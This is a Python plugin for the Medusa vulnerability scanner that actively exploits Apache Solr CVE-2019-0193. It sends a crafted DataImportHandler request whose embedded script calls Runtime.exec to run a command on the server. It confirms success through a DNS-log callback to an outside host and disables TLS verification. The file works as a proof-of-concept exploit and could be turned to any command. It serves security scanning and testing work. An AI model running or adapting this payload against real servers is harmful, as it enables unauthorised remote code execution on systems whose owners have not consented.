#!/usr/bin/env python
# -*- coding: utf-8 -*-

__author__ = 'Ascotbe'
import requests
import json
from ClassCongregation import VulnerabilityDetails,UrlProcessing,ErrorLog,WriteFile,Dnslog
# Silence urllib3's warnings process-wide; without this the verify=False POST
# in medusa() would print an InsecureRequestWarning on every target.
requests.packages.urllib3.disable_warnings()
class VulnerabilityInfo(object):
    """Plugin metadata for the Solr DataImportHandler finding (CVE-2019-0193).

    ``info`` is the dict handed to VulnerabilityDetails; ``Medusa`` is the
    free-text scan result stored under the ``details`` key.
    """

    def __init__(self, Medusa):
        # Keys follow the scanner's plugin template, in its order.
        self.info = dict(
            number="CVE-2019-0193",  # CVE id; CNVD id if no CVE exists; 0 if neither
            author="Ascotbe",  # plugin author
            createDate="2020-2-19",  # plugin edit date
            disclosure='2019-8-1',  # disclosure date (plugin date if unknown)
            algroup="SolrRemoteCodeExecutionVulnerability",  # plugin name
            name='Solr远程代码执行漏洞',  # vulnerability name
            affects="Solr",  # affected component
            desc_content="ApacheSolr如果启用了DataImportHandler模块，因为它支持使用web请求来指定配置信息DIH配置攻击者可构造HTTP请求指定dataConfig参数的值(dataConfig内容)，dataConfig内容完全可控(多种利用方式)，后端处理的过程中，可导致命令执行。",  # description
            rank="高危",  # severity
            suggest="尽快升级最新系统",  # remediation advice
            version="ApacheSolr<8.2.0",  # affected versions
            details=Medusa,  # scan result text
        )


def medusa(Url: str, RandomAgent: str, ProxyIp=None) -> None:
    """Active check for CVE-2019-0193 (Solr DataImportHandler) against one target.

    Two requests are sent: a GET to ``/solr/admin/cores`` to pick a core name,
    then a POST to ``/solr/<core>/dataimport`` with ``command=full-import`` and
    a ``dataConfig`` parameter whose script transformer makes a vulnerable server
    run ``ping <dnslog host>``. The finding is recorded only when the DNS-log
    callback is seen, so this is an out-of-band check with a server-side side
    effect, not a passive fingerprint; on the target it is visible as exactly
    that POST in the Solr request log.

    Nothing is returned: a hit goes to VulnerabilityDetails and WriteFile, any
    exception is swallowed and written to ErrorLog.

    Args:
        Url: target as accepted by UrlProcessing().result().
        RandomAgent: User-Agent value sent on both requests.
        ProxyIp: accepted for interface compatibility but never used here.
    """
    scheme, url, port = UrlProcessing().result(Url)
    if port is None and scheme == 'https':
        port = 443
    elif port is None and scheme == 'http':
        port = 80
    else:
        port = port  # no-op: an explicit port is kept as given
    try:
        headers = {
            'User-Agent': RandomAgent,
            'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8'
        }
        payload_url=scheme + "://" + url + ":" + str(port) +'/solr/admin/cores'
        # Step 1: core listing. `verify` is left at the requests default here,
        # unlike the POST below; a non-JSON body makes json.loads raise into the
        # blanket except at the bottom.
        step1 =requests.get(payload_url,timeout=6, headers = headers).text
        data = json.loads(step1)
        if 'status' in data:
            name = ''
            for x in data['status']:
                name = x  # ends up as the last core name iterated
            # NOTE(review): the `_=` query value looks like a fixed cache-buster — confirm
            payload = "/solr/"+name+"/dataimport?_=1582117587113&indent=on&wt=json"
            payload_url = scheme + "://" + url + ":" + str(port) + payload
            headers = {
                'User-Agent': RandomAgent,
                'Accept': 'application/json',
                "Accept-Language": "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2",
                "Accept-Encoding": "gzip, deflate",
                "Content-Type": "application/x-www-form-urlencoded",
                "X-Requested-With": "XMLHttpRequest"
            }
            DL = Dnslog()  # DNS-log session; its host is embedded in the payload below
            # Author's note: the POC works, the DNS-log part is unreliable.
            # DL="p61rpm.dnslog.cn"  (a hard-coded host once used instead of Dnslog())
            # Step 2: DIH full-import body. Note `core=test` in the body is
            # hard-coded while the URL path uses `name` from step 1.
            data2="command=full-import&verbose=false&clean=false&commit=true&debug=true&core=test&dataConfig=%3CdataConfig%3E%0A++%3CdataSource+type%3D%22URLDataSource%22%2F%3E%0A++%3Cscript%3E%3C!%5BCDATA%5B%0A++++++++++function+poc()%7B+java.lang.Runtime.getRuntime().exec(%22ping+{}%22)%3B%0A++++++++++%7D%0A++%5D%5D%3E%3C%2Fscript%3E%0A++%3Cdocument%3E%0A++++%3Centity+name%3D%22stackoverflow%22%0A++++++++++++url%3D%22https%3A%2F%2Fstackoverflow.com%2Ffeeds%2Ftag%2Fsolr%22%0A++++++++++++processor%3D%22XPathEntityProcessor%22%0A++++++++++++forEach%3D%22%2Ffeed%22%0A++++++++++++transformer%3D%22script%3Apoc%22+%2F%3E%0A++%3C%2Fdocument%3E%0A%3C%2FdataConfig%3E&name=dataimport".format(DL.dns_host())
            # verify=False: TLS certificate checks are off for this request.
            # The response itself is never inspected; only the DNS-log decides.
            resp = requests.post(payload_url,data=data2,headers=headers, timeout=20, verify=False)
            if DL.result():  # presumably polls the DNS-log for the callback — confirm in Dnslog
                Medusa = "{}存在Solr远程代码执行漏洞\r\n 验证数据:\r\n漏洞位置:{}\r\nPOST包:{}\r\n".format(url,payload_url,data2)
                _t = VulnerabilityInfo(Medusa)
                web = VulnerabilityDetails(_t.info)
                web.High()  # severity: serious / High / Intermediate / Low
                WriteFile().result(str(url),str(Medusa))  # url is the per-target file name, Medusa the result text
    except Exception:
        # Every failure (connection, TLS, timeout, non-JSON body, DNS-log error)
        # lands here and is only logged under the plugin's name; nothing is re-raised.
        _ = VulnerabilityInfo('').info.get('algroup')
        _l = ErrorLog().Write(url, _)  # ErrorLog takes the target URL and the failing plugin name

